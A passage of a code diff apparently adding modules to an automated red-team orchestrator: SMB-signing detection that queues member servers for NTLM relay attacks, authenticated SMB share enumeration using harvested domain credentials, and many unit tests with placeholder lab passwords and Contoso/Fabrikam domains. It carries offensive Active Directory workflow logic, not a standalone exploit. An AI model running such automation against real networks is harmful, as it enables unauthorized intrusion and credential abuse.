+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SID_ENUMERATION, "sid_enum:contoso.local".into());
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_cross_domain_fallback() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "crossuser");
+ assert_eq!(work[0].credential.domain, "fabrikam.local");
+ }
+
+ #[test]
+ fn collect_skips_empty_password() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "", "contoso.local"));
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_quarantined_credential_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.quarantine_credential("baduser", "contoso.local");
+ let work = collect_sid_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "sid_enum:contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_sid_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/smb_signing.rs b/ares-cli/src/orchestrator/automation/smb_signing.rs
new file mode 100644
index 00000000..909f41f0
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/smb_signing.rs
@@ -0,0 +1,279 @@
+//! auto_smb_signing_detection -- bridge recon host data to VulnerabilityInfo.
+//!
+//! The SMB banner parser (`hosts.rs`) detects `(signing:True)` to mark DCs but
+//! does NOT create VulnerabilityInfo objects for hosts with signing disabled.
+//! This module scans `state.hosts` for non-DC hosts (signing:False is the default
+//! for member servers) and publishes `smb_signing_disabled` vulns, which the
+//! `ntlm_relay` module consumes to dispatch relay attacks.
+//!
+//! Pattern: mirrors `auto_mssql_detection` — scan host list, publish vulns.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::StateInner;
+
+/// Work item for SMB signing detection.
+struct SmbSigningWork {
+ ip: String,
+ hostname: String,
+ domain: String,
+}
+
+fn collect_smb_signing_work(state: &StateInner) -> Vec {
+ state
+ .hosts
+ .iter()
+ .filter(|h| {
+ // Non-DC hosts with SMB (port 445) likely have signing disabled.
+ // DCs enforce signing:True; member servers default to signing not required.
+ !h.is_dc
+ && !h.hostname.is_empty()
+ && !state
+ .discovered_vulnerabilities
+ .contains_key(&format!("smb_signing_{}", h.ip.replace('.', "_")))
+ })
+ .map(|h| {
+ let domain = h
+ .hostname
+ .find('.')
+ .map(|i| h.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ SmbSigningWork {
+ ip: h.ip.clone(),
+ hostname: h.hostname.clone(),
+ domain,
+ }
+ })
+ .collect()
+}
+
+/// Scans discovered hosts for SMB signing disabled (non-DC Windows hosts).
+/// DCs enforce signing; member servers typically do not.
+/// Interval: 30s.
+pub async fn auto_smb_signing_detection(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("smb_signing_disabled") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_smb_signing_work(&state)
+ };
+
+ for item in work {
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("smb_signing_{}", item.ip.replace('.', "_")),
+ vuln_type: "smb_signing_disabled".to_string(),
+ target: item.ip.clone(),
+ discovered_by: "auto_smb_signing_detection".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.ip));
+ d.insert("ip".to_string(), json!(item.ip));
+ if !item.hostname.is_empty() {
+ d.insert("hostname".to_string(), json!(item.hostname));
+ }
+ if !item.domain.is_empty() {
+ d.insert("domain".to_string(), json!(item.domain));
+ }
+ d
+ },
+ recommended_agent: "coercion".to_string(),
+ priority: dispatcher.effective_priority("smb_signing_disabled"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(ip = %item.ip, hostname = %item.hostname, "SMB signing disabled — vulnerability queued for relay");
+ }
+ Ok(false) => {} // already exists
+ Err(e) => {
+ warn!(err = %e, ip = %item.ip, "Failed to publish SMB signing vulnerability")
+ }
+ }
+ }
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn vuln_id_format() {
+ let ip = "192.168.58.22";
+ let vuln_id = format!("smb_signing_{}", ip.replace('.', "_"));
+ assert_eq!(vuln_id, "smb_signing_192_168_58_22");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_non_dc_host_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].ip, "192.168.58.22");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_dc_host_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_empty_hostname_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.22", "", false));
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_already_discovered_vuln_skipped() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ // Simulate existing vulnerability
+ state.discovered_vulnerabilities.insert(
+ "smb_signing_192_168_58_22".into(),
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: "smb_signing_192_168_58_22".into(),
+ vuln_type: "smb_signing_disabled".into(),
+ target: "192.168.58.22".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: std::collections::HashMap::new(),
+ recommended_agent: "coercion".into(),
+ priority: 5,
+ },
+ );
+ let work = collect_smb_signing_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_multiple_hosts_mixed_dc_and_member() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local", false));
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.22"));
+ assert!(ips.contains(&"192.168.58.23"));
+ assert!(!ips.contains(&"192.168.58.10"));
+ }
+
+ #[test]
+ fn collect_host_without_fqdn_gets_empty_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.22", "srv01", false));
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ }
+
+ #[test]
+ fn collect_skips_vuln_keeps_clean() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local", false));
+ // Only 192.168.58.22 has existing vuln
+ state.discovered_vulnerabilities.insert(
+ "smb_signing_192_168_58_22".into(),
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: "smb_signing_192_168_58_22".into(),
+ vuln_type: "smb_signing_disabled".into(),
+ target: "192.168.58.22".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: std::collections::HashMap::new(),
+ recommended_agent: "coercion".into(),
+ priority: 5,
+ },
+ );
+ let work = collect_smb_signing_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].ip, "192.168.58.23");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/smbclient_enum.rs b/ares-cli/src/orchestrator/automation/smbclient_enum.rs
new file mode 100644
index 00000000..3379d0dc
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/smbclient_enum.rs
@@ -0,0 +1,745 @@
+//! auto_smbclient_enum -- authenticated SMB share listing per domain.
+//!
+//! Complements auto_share_enumeration by using authenticated sessions to
+//! discover shares that require credentials. Uses smbclient or netexec
+//! to list shares on all known hosts.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect SMB enumeration work items from current state.
+///
+/// Pure logic extracted from the async loop so it can be unit-tested
+/// without a Dispatcher or runtime.
+fn collect_smbclient_work(state: &crate::orchestrator::state::StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ // Check if host has SMB
+ let has_smb = host.services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ if !has_smb {
+ continue;
+ }
+
+ let dedup_key = format!("smb_auth_enum:{}", host.ip);
+ if state.is_processed(DEDUP_SMBCLIENT_ENUM, &dedup_key) {
+ continue;
+ }
+
+ // Infer domain from hostname
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_string())
+ .unwrap_or_default();
+
+ // Pick a credential for this domain
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| {
+ !domain.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .or_else(|| {
+ state.credentials.iter().find(|c| {
+ !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(SmbEnumWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches authenticated SMB share enumeration per host.
+/// Interval: 45s.
+pub async fn auto_smbclient_enum(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("smbclient_enum") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ let items = collect_smbclient_work(&state);
+ if items.is_empty() {
+ continue;
+ }
+ items
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "authenticated_share_enumeration",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("smbclient_enum");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ host = %item.target_ip,
+ "Authenticated SMB share enumeration dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SMBCLIENT_ENUM, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SMBCLIENT_ENUM, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(host = %item.target_ip, "SMB auth enum deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, host = %item.target_ip, "Failed to dispatch SMB auth enum");
+ }
+ }
+ }
+ }
+}
+
+struct SmbEnumWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::SharedState;
+
+ /// Helper: create a credential for tests.
+ fn make_cred(user: &str, pass: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{user}"),
+ username: user.into(),
+ password: pass.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ /// Helper: create a host with given services.
+ fn make_host(ip: &str, hostname: &str, services: Vec<&str>) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: vec![],
+ services: services.into_iter().map(String::from).collect(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ // ---- collect_smbclient_work tests ----
+
+ #[tokio::test]
+ async fn collect_empty_state_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_credentials_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_no_smb_hosts_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "web01.contoso.local",
+ vec!["80/tcp http", "443/tcp https"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_single_host_single_cred() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.10");
+ assert_eq!(work[0].hostname, "dc01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].dedup_key, "smb_auth_enum:192.168.58.10");
+ }
+
+ #[tokio::test]
+ async fn collect_multiple_hosts() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.contoso.local",
+ vec!["445/tcp smb", "80/tcp http"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.10"));
+ assert!(ips.contains(&"192.168.58.20"));
+ }
+
+ #[tokio::test]
+ async fn collect_dedup_skips_already_processed() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.20");
+ }
+
+ #[tokio::test]
+ async fn collect_prefers_same_domain_credential() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_cred("con_user", "Con123!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "con_user");
+ }
+
+ #[tokio::test]
+ async fn collect_falls_back_to_any_credential_when_no_domain_match() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fab_user");
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_password_credentials() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "", "contoso.local"));
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_skips_empty_password_falls_back() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fab_user");
+ }
+
+ #[tokio::test]
+ async fn collect_bare_hostname_empty_domain() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "srv01", vec!["445/tcp smb"]));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_cifs_service_detected() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "nas01.contoso.local",
+ vec!["cifs file share"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[tokio::test]
+ async fn collect_case_insensitive_domain_matching() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.CONTOSO.LOCAL",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "CONTOSO.LOCAL");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[tokio::test]
+ async fn collect_mixed_smb_and_non_smb_hosts() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp microsoft-ds", "88/tcp kerberos"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "web01.contoso.local",
+ vec!["80/tcp http", "443/tcp https"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.30",
+ "sql01.contoso.local",
+ vec!["1433/tcp mssql", "445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.10"));
+ assert!(!ips.contains(&"192.168.58.20"));
+ assert!(ips.contains(&"192.168.58.30"));
+ }
+
+ #[tokio::test]
+ async fn collect_all_deduped_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "srv01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into());
+ state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.20".into());
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_cross_domain_hosts_get_correct_creds() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state.hosts.push(make_host(
+ "192.168.58.20",
+ "dc02.fabrikam.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("con_admin", "ConPass!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_cred("fab_admin", "FabPass!", "fabrikam.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert_eq!(work.len(), 2);
+
+ let contoso_work = work
+ .iter()
+ .find(|w| w.target_ip == "192.168.58.10")
+ .unwrap();
+ assert_eq!(contoso_work.credential.username, "con_admin");
+
+ let fabrikam_work = work
+ .iter()
+ .find(|w| w.target_ip == "192.168.58.20")
+ .unwrap();
+ assert_eq!(fabrikam_work.credential.username, "fab_admin");
+ }
+
+ #[tokio::test]
+ async fn collect_only_empty_password_creds_returns_nothing() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state.hosts.push(make_host(
+ "192.168.58.10",
+ "dc01.contoso.local",
+ vec!["445/tcp smb"],
+ ));
+ state
+ .credentials
+ .push(make_cred("user1", "", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("user2", "", "fabrikam.local"));
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[tokio::test]
+ async fn collect_host_with_empty_services() {
+ let shared = SharedState::new("op-test".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", vec![]));
+ state
+ .credentials
+ .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_smbclient_work(&state);
+ assert!(work.is_empty());
+ }
+
+ // ---- original tests ----
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("smb_auth_enum:{}", "192.168.58.10");
+ assert_eq!(key, "smb_auth_enum:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SMBCLIENT_ENUM, "smbclient_enum");
+ }
+
+ #[test]
+ fn smb_service_detection() {
+ let services = [
+ "445/tcp microsoft-ds".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn smb_service_detection_by_name() {
+ let services = ["microsoft-ds smb".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn no_smb_service() {
+ let services = [
+ "3389/tcp ms-wbt-server".to_string(),
+ "80/tcp http".to_string(),
+ ];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(!has_smb);
+ }
+
+ #[test]
+ fn domain_from_hostname_preserves_case() {
+ // smbclient_enum uses to_string() not to_lowercase() for domain
+ let hostname = "srv01.CONTOSO.LOCAL";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default();
+ assert_eq!(domain, "CONTOSO.LOCAL");
+ }
+
+ #[test]
+ fn smb_service_detection_cifs() {
+ let services = ["cifs share".to_string()];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(has_smb);
+ }
+
+ #[test]
+ fn domain_from_bare_hostname() {
+ let hostname = "srv01";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_string())
+ .unwrap_or_default();
+ assert_eq!(domain, "");
+ }
+
+ #[test]
+ fn smb_enum_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "authenticated_share_enumeration",
+ "target_ip": "192.168.58.22",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ });
+ assert_eq!(payload["technique"], "authenticated_share_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.22");
+ assert_eq!(payload["credential"]["username"], "admin");
+ }
+
+ #[test]
+ fn credential_domain_matching_case_insensitive() {
